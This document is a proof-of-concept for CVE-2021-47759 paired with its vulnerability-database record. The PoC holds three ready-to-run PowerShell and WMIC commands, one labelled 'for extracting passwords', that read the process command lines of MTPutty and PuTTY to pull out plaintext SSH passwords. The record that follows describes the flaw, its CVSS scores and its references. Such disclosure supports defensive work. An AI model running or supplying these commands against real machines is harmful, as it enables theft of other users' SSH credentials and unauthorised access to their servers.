CVE-2021-47759

# PowerShell PoC for CVE-2021-47759 # MTPutty SSH Password Disclosure via Process Listing # Method 1: Using Get-Process with CommandLine Get-Process | Where-Object {$_.ProcessName -like "*mtputty*" -or $_.ProcessName -like "*putty*"} | ForEach-Object { $process = Get-CimInstance Win32_Process -Filter "ProcessId=$($_.Id)" Write-Host "Process: $($_.ProcessName) (PID: $($_.Id))" Write-Host "Command Line: $($process.CommandLine)" Write-Host "---" } # Method 2: Using WMIC to query all process command lines wmic process where "name like '%putty%' or name like '%mtputty%'" get commandline,processid # Method 3: PowerShell one-liner for extracting passwords Get-CimInstance Win32_Process | Where-Object {$_.CommandLine -match 'putty|mtputty'} | Select-Object ProcessId, CommandLine | Format-List

{"cve": {"id": "CVE-2021-47759", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:06.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "MTPutty 1.0.1.21 contains a sensitive information disclosure vulnerability that allows local attackers to view SSH connection passwords through Windows PowerShell process listing. Attackers can run a PowerShell command to retrieve the full command line of MTPutty processes, exposing plaintext SSH credentials."}, {"lang": "es", "value": "MTPutty 1.0.1.21 contiene una vulnerabilidad de revelación de información sensible que permite a atacantes locales ver contraseñas de conexión SSH a través del listado de procesos de Windows PowerShell. Los atacantes pueden ejecutar un comando de PowerShell para recuperar la línea de comandos completa de los procesos de MTPutty, exponiendo credenciales SSH en texto plano."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "https://ttyplus.com/multi-tabbed-putty/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50574", "source": "[email protected]"}]}}